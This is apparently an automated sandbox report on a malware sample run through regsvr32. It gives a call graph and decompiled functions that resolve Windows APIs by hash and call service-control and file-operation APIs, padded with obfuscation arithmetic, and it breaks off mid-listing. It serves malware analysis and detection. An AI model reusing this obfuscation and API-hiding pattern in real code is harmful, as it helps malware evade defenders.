4841->4848 4849 982c16 4841->4849 4851 982c31 4841->4851 4852 98b200 GetPEB 4841->4852 4853 984bb4 2 API calls 4841->4853 4854 99734a GetPEB 4841->4854 4855 98b9d7 GetPEB 4841->4855 4856 989b80 3 API calls 4841->4856 4943 9a0e6d 4841->4943 4951 98fbf8 4841->4951 4954 98db59 4841->4954 4844->4841 4845->4841 4846->4841 4848->4841 4850 99e373 2 API calls 4849->4850 4850->4851 4851->4059 4852->4841 4853->4841 4854->4841 4855->4841 4856->4841 4859 98d206 4857->4859 4858 98d24f 4858->4059 4859->4858 4860 99aa59 GetPEB 4859->4860 4862 98d23b 4859->4862 4985 983c51 4859->4985 4993 990e0b 4859->4993 4860->4859 4863 990f7a GetPEB 4862->4863 4863->4858 4867 9a1738 4865->4867 4866 99aa59 GetPEB 4866->4867 4867->4866 4868 9a176d 4867->4868 4869 983c51 GetPEB 4867->4869 4871 9a1781 4867->4871 4872 990e0b GetPEB 4867->4872 4870 990f7a GetPEB 4868->4870 4869->4867 4870->4871 4871->4059 4872->4867 4884 99710c 4873->4884 4874 989574 GetPEB 4874->4884 4875 997210 4875->4059 4875->4875 4876 997128 4877 9966c2 2 API calls 4876->4877 4879 99715b 4877->4879 4878 98ffde GetPEB 4878->4884 4880 984bb4 2 API calls 4879->4880 4882 99717e 4880->4882 4881 98b200 GetPEB 4881->4884 4883 99734a GetPEB 4882->4883 4885 9971be 4883->4885 4884->4874 4884->4875 4884->4876 4884->4878 4884->4881 4886 984bb4 2 API calls 4884->4886 4888 99734a GetPEB 4884->4888 4891 98b9d7 GetPEB 4884->4891 4892 989b80 3 API calls 4884->4892 4887 98b9d7 GetPEB 4885->4887 4886->4884 4889 9971d6 4887->4889 4888->4884 4890 9963f0 3 API calls 4889->4890 4890->4875 4891->4884 4892->4884 4894 990f8d 4893->4894 4897 9a1bd6 4894->4897 4898 9a1bf5 4897->4898 4899 99bff0 GetPEB 4898->4899 4900 991069 4899->4900 4900->4804 4902 99641e 4901->4902 4903 98b184 GetPEB 4902->4903 4904 99663b 4903->4904 4922 9946e0 4904->4922 4906 996683 4906->4811 4907 996676 4907->4906 4908 99e373 2 API calls 4907->4908 4909 9966a3 4908->4909 4910 99e373 2 API calls 4909->4910 4910->4906 4912 98b219 4911->4912 4913 98f2b9 GetPEB 4912->4913 4914 98b2e7 4913->4914 4914->4807 4917 989b9f 4915->4917 4918 989e5e 4917->4918 4919 99bf1c 2 API calls 4917->4919 4921 989e5c 4917->4921 4926 99454e 4917->4926 4920 99e373 2 API calls 4918->4920 4919->4917 4920->4921 4921->4807 4923 99471e 4922->4923 4924 99bff0 GetPEB 4923->4924 4925 9947b3 CreateProcessW 4924->4925 4925->4907 4927 994575 4926->4927 4928 99bff0 GetPEB 4927->4928 4929 994615 4928->4929 4929->4917 4931 99bff0 GetPEB 4930->4931 4932 99e0c1 4931->4932 4932->4836 4934 98f7a0 4933->4934 4935 98f983 4934->4935 4936 98f985 4934->4936 4938 99eaa3 2 API calls 4934->4938 4935->4836 4937 984627 GetPEB 4936->4937 4937->4935 4938->4934 4940 98d7d6 4939->4940 4941 99bff0 GetPEB 4940->4941 4942 98d87c 4941->4942 4942->4836 4944 9a0e92 4943->4944 4946 98fbf8 GetPEB 4944->4946 4947 9a1061 4944->4947 4950 9a1076 4944->4950 4965 99d0a1 4944->4965 4969 982f1a 4944->4969 4946->4944 4949 99e373 2 API calls 4947->4949 4949->4950 4950->4841 4952 99bff0 GetPEB 4951->4952 4953 98fcac 4952->4953 4953->4841 4955 98db99 4954->4955 4957 98b184 GetPEB 4955->4957 4958 98df48 4955->4958 4959 984bb4 2 API calls 4955->4959 4961 98e07b 4955->4961 4964 98b9d7 GetPEB 4955->4964 4977 995a47 4955->4977 4981 99e8e7 4955->4981 4957->4955 4973 9a1d6d 4958->4973 4959->4955 4961->4961 4964->4955 4966 99d0bd 4965->4966 4967 99bff0 GetPEB 4966->4967 4968 99d13e 4967->4968 4968->4944 4970 982f3e 4969->4970 4971 99bff0 GetPEB 4970->4971 4972 982fcc 4971->4972 4972->4944 4974 9a1d80 4973->4974 4975 99bff0 GetPEB 4974->4975 4976 98df59 4975->4976 4976->4841 4978 995a82 4977->4978 4979 99bff0 GetPEB 4978->4979 4980 995b29 4979->4980 4980->4955 4982 99e902 4981->4982 4983 99bff0 GetPEB 4982->4983 4984 99e994 4983->4984 4984->4955 4986 983c6f 4985->4986 4987 983eff 4986->4987 4998 993ff6 4986->4998 4987->4859 4990 991d1c GetPEB 4991 983eb6 4990->4991 4991->4987 4992 991d1c GetPEB 4991->4992 4992->4991 4996 990e27 4993->4996 4994 990f48 4994->4859 4995 99e9a4 GetPEB 4995->4996 4996->4994 4996->4995 5002 983455 4996->5002 4999 994017 4998->4999 5000 99bff0 GetPEB 4999->5000 5001 983e94 5000->5001 5001->4987 5001->4990 5003 983468 5002->5003 5004 99bff0 GetPEB 5003->5004 5005 983502 5004->5005 5005->4996 5007 99da29 5006->5007 5008 99bff0 GetPEB 5007->5008 5009 983149 5008->5009 5009->3871 5011 995cca 5010->5011 5012 99bff0 GetPEB 5011->5012 5013 995d5a 5012->5013 5013->4075 5016 9900ae 5014->5016 5015 997394 GetPEB 5015->5016 5016->5015 5017 99eaa3 2 API calls 5016->5017 5018 99040e 5016->5018 5017->5016 5018->4075 5020 98f61e 5019->5020 5021 99bff0 GetPEB 5020->5021 5022 98f6be 5021->5022 5022->4075 5024 99bff0 GetPEB 5023->5024 5025 98e370 5024->5025 5025->4075 5027 98f9bd 5026->5027 5028 99bff0 GetPEB 5027->5028 5029 98fa61 5028->5029 5029->4082 5031 995c1b 5030->5031 5032 99bff0 GetPEB 5031->5032 5033 995ca5 5032->5033 5033->4087 5035 98e0fe 5034->5035 5036 99bff0 GetPEB 5035->5036 5037 98e19d 5036->5037 5037->4087 5041 98d8af 5038->5041 5039 98da67 5062 98ff02 5039->5062 5041->5039 5043 98b184 GetPEB 5041->5043 5044 98da65 5041->5044 5058 991c3c 5041->5058 5043->5041 5044->4101 5050 989425 5045->5050 5046 984bb4 2 API calls 5046->5050 5047 98954c 5049 983152 GetPEB 5047->5049 5048 983f09 GetPEB 5048->5050 5051 98954a 5049->5051 5050->5046 5050->5047 5050->5048 5050->5051 5053 98b9d7 GetPEB 5050->5053 5066 99462a 5050->5066 5051->4101 5053->5050 5055 98f6e5 5054->5055 5056 99bff0 GetPEB 5055->5056 5057 98f778 5056->5057 5057->4111 5059 991c5e 5058->5059 5060 99bff0 GetPEB 5059->5060 5061 991d0f 5060->5061 5061->5041 5063 98ff24 5062->5063 5064 99bff0 GetPEB 5063->5064 5065 98ffca 5064->5065 5065->5044 5067 994649 5066->5067 5068 99bff0 GetPEB 5067->5068 5069 9946d3 5068->5069 5069->5050 5080 985c9a 5087 98617c 5080->5087 5081 986a8d GetPEB 5081->5087 5082 99bf1c 2 API calls 5082->5087 5083 98638d 5084 989574 GetPEB 5084->5087 5085 98638f 5088 99e373 2 API calls 5085->5088 5087->5081 5087->5082 5087->5083 5087->5084 5087->5085 5089 98ffde GetPEB 5087->5089 5090 99eaa3 2 API calls 5087->5090 5093 99ab39 5087->5093 5097 99589f 5087->5097 5101 9a2727 5087->5101 5088->5083 5089->5087 5090->5087 5094 99ab6c 5093->5094 5095 99bff0 GetPEB 5094->5095 5096 99ac10 5095->5096 5096->5087 5098 9958b2 5097->5098 5099 99bff0 GetPEB 5098->5099 5100 995949 5099->5100 5100->5087 5102 9a2737 5101->5102 5103 99bff0 GetPEB 5102->5103 5104 9a27d3 5103->5104 5104->5087 5105 9872cc 5106 98ffde GetPEB 5105->5106 5107 98750d 5106->5107 5108 99589f GetPEB 5107->5108 5109 987520 5108->5109 5110 984bb4 2 API calls 5109->5110 5117 98758b 5109->5117 5111 98753e 5110->5111 5112 99734a GetPEB 5111->5112 5113 987568 5112->5113 5114 98b9d7 GetPEB 5113->5114 5115 987577 5114->5115 5116 989ea8 2 API calls 5115->5116 5116->5117 5070 9963f0 5071 99641e 5070->5071 5072 98b184 GetPEB 5071->5072 5073 99663b 5072->5073 5074 9946e0 2 API calls 5073->5074 5076 996676 5074->5076 5075 996683 5076->5075 5077 99e373 2 API calls 5076->5077 5078 9966a3 5077->5078 5079 99e373 2 API calls 5078->5079 5079->5075 5118 9888e5 5119 988a5e 5118->5119 5120 988aa9 5119->5120 5121 99e18b 2 API calls 5119->5121 5122 988a79 5121->5122 5126 9908c0 5122->5126 5125 98b9d7 GetPEB 5125->5120 5127 9908e5 5126->5127 5129 988a91 5127->5129 5130 9919a4 5127->5130 5129->5125 5131 9919bd 5130->5131 5132 99bff0 GetPEB 5131->5132 5133 991a63 5132->5133 5133->5127

                                                                                                                Executed Functions

                                                                                                                Function 0098F1D5 Relevance: 1.6, APIs: 1, Instructions: 69COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0098F1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E00989E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E0099BFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

















                                                                                                                0x0098f1e5
                                                                                                                0x0098f1ea
                                                                                                                0x0098f1f5
                                                                                                                0x0098f1fa
                                                                                                                0x0098f203
                                                                                                                0x0098f20a
                                                                                                                0x0098f20d
                                                                                                                0x0098f210
                                                                                                                0x0098f217
                                                                                                                0x0098f21b
                                                                                                                0x0098f21f
                                                                                                                0x0098f226
                                                                                                                0x0098f22d
                                                                                                                0x0098f23a
                                                                                                                0x0098f23e
                                                                                                                0x0098f241
                                                                                                                0x0098f245
                                                                                                                0x0098f24c
                                                                                                                0x0098f253
                                                                                                                0x0098f25a
                                                                                                                0x0098f25e
                                                                                                                0x0098f265
                                                                                                                0x0098f276
                                                                                                                0x0098f279
                                                                                                                0x0098f27d
                                                                                                                0x0098f284
                                                                                                                0x0098f2a3
                                                                                                                0x0098f2b0
                                                                                                                0x0098f2b8

                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 0098F2B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction ID: dc3815b0d37b00f17330572a4786bc6def74230763cbd9f73a955ff3d1942971
                                                                                                                • Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction Fuzzy Hash: C52144B5D0121DAFDB08DFA5C88A9EEBBB4FB44708F10809DE515AA240C7B45B54DFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009832B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 498 9832b5-98338a call 989e7d call 99bff0 OpenSCManagerW
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E009832B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E00989E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E0099BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}














                                                                                                                0x009832be
                                                                                                                0x009832bf
                                                                                                                0x009832c2
                                                                                                                0x009832c3
                                                                                                                0x009832c8
                                                                                                                0x009832cd
                                                                                                                0x009832d6
                                                                                                                0x009832d9
                                                                                                                0x009832dc
                                                                                                                0x009832e9
                                                                                                                0x009832ec
                                                                                                                0x009832f4
                                                                                                                0x009832f5
                                                                                                                0x009832fa
                                                                                                                0x00983304
                                                                                                                0x0098330b
                                                                                                                0x0098330f
                                                                                                                0x00983316
                                                                                                                0x0098331d
                                                                                                                0x00983324
                                                                                                                0x00983335
                                                                                                                0x00983338
                                                                                                                0x0098333c
                                                                                                                0x00983343
                                                                                                                0x0098334a
                                                                                                                0x00983361
                                                                                                                0x00983364
                                                                                                                0x00983377
                                                                                                                0x00983384
                                                                                                                0x0098338a

                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 00983384
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: w\ y
                                                                                                                • API String ID: 1889721586-240614871
                                                                                                                • Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction ID: 1d930cecceb09b3cdc5be659920f6d67a41c167dcf51d783231f91b1c51f3e85
                                                                                                                • Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction Fuzzy Hash: 2E2123B5D01228FBCB04EFA9D84A9EEBFB5FB40304F208189E425A6251D3B55B40DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0098C4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 503 98c4eb-98c5c2 call 989e7d call 99bff0 OpenServiceW
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0098C4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00989E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E0099BFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}














                                                                                                                0x0098c4f2
                                                                                                                0x0098c4f5
                                                                                                                0x0098c4f7
                                                                                                                0x0098c4fa
                                                                                                                0x0098c4fd
                                                                                                                0x0098c500
                                                                                                                0x0098c501
                                                                                                                0x0098c502
                                                                                                                0x0098c507
                                                                                                                0x0098c50e
                                                                                                                0x0098c515
                                                                                                                0x0098c51c
                                                                                                                0x0098c523
                                                                                                                0x0098c52a
                                                                                                                0x0098c52d
                                                                                                                0x0098c531
                                                                                                                0x0098c538
                                                                                                                0x0098c53f
                                                                                                                0x0098c556
                                                                                                                0x0098c55e
                                                                                                                0x0098c562
                                                                                                                0x0098c569
                                                                                                                0x0098c570
                                                                                                                0x0098c577
                                                                                                                0x0098c57e
                                                                                                                0x0098c585
                                                                                                                0x0098c58c
                                                                                                                0x0098c593
                                                                                                                0x0098c59a
                                                                                                                0x0098c5ad
                                                                                                                0x0098c5bc
                                                                                                                0x0098c5c2

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 0098C5BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: "
                                                                                                                • API String ID: 3098006287-1598837362
                                                                                                                • Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction ID: 2b2a546dfab7293dfe38e48e92812faf0b690a648d90b17271b6cab05067681a
                                                                                                                • Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction Fuzzy Hash: 932120B6C0020DEBCF15DFA4D9499EEBBB4FF04318F108588E92566260E3B55B14DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0099A98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 508 99a98e-99aa51 call 989e7d call 99bff0 CloseServiceHandle
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0099A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E00989E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E0099BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}













                                                                                                                0x0099a994
                                                                                                                0x0099a997
                                                                                                                0x0099a99c
                                                                                                                0x0099a9a1
                                                                                                                0x0099a9a7
                                                                                                                0x0099a9ae
                                                                                                                0x0099a9b5
                                                                                                                0x0099a9c2
                                                                                                                0x0099a9c5
                                                                                                                0x0099a9c8
                                                                                                                0x0099a9cf
                                                                                                                0x0099a9db
                                                                                                                0x0099a9dc
                                                                                                                0x0099a9e1
                                                                                                                0x0099a9eb
                                                                                                                0x0099a9f2
                                                                                                                0x0099a9f9
                                                                                                                0x0099aa00
                                                                                                                0x0099aa17
                                                                                                                0x0099aa1a
                                                                                                                0x0099aa2b
                                                                                                                0x0099aa2e
                                                                                                                0x0099aa41
                                                                                                                0x0099aa4c
                                                                                                                0x0099aa51

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 0099AA4C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ijp
                                                                                                                • API String ID: 1725840886-2001787820
                                                                                                                • Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction ID: 0cd8a8d41e2f9a0039a381fcbf817f9d33fc4b7c22dc94ff2348f9bfd737ad8d
                                                                                                                • Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction Fuzzy Hash: 542117B5D0520DFBEF04DFA8D98A9AEBBB1EB40304F10C199E405AB250D7B49B449F84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0098338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 513 98338b-983454 call 989e7d call 99bff0 SHFileOperationW
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E0098338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E00989E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E0099BFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}













                                                                                                                0x00983391
                                                                                                                0x00983396
                                                                                                                0x0098339b
                                                                                                                0x009833a1
                                                                                                                0x009833a5
                                                                                                                0x009833ac
                                                                                                                0x009833b9
                                                                                                                0x009833bd
                                                                                                                0x009833c0
                                                                                                                0x009833c7
                                                                                                                0x009833d8
                                                                                                                0x009833db
                                                                                                                0x009833f2
                                                                                                                0x009833f5
                                                                                                                0x009833fc
                                                                                                                0x00983403
                                                                                                                0x0098340a
                                                                                                                0x0098340e
                                                                                                                0x00983415
                                                                                                                0x0098341c
                                                                                                                0x00983427
                                                                                                                0x0098342a
                                                                                                                0x00983431
                                                                                                                0x00983444
                                                                                                                0x0098344f
                                                                                                                0x00983454

                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 0098344F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID: |[0
                                                                                                                • API String ID: 3080627654-3711761429
                                                                                                                • Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction ID: d88647b3e4e6a306992141077f42ec1123fb13e98b5180e10faa5a2db60d8860
                                                                                                                • Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction Fuzzy Hash: 492136B4D00209EFCF04DFA5C94AAEEBFB4FB40304F108189E424AA251D7B96B548F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0099E373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0099E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E00989E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E0099BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}











                                                                                                                0x0099e37a
                                                                                                                0x0099e37d
                                                                                                                0x0099e37f
                                                                                                                0x0099e382
                                                                                                                0x0099e384
                                                                                                                0x0099e389
                                                                                                                0x0099e392
                                                                                                                0x0099e399
                                                                                                                0x0099e3a0
                                                                                                                0x0099e3a7
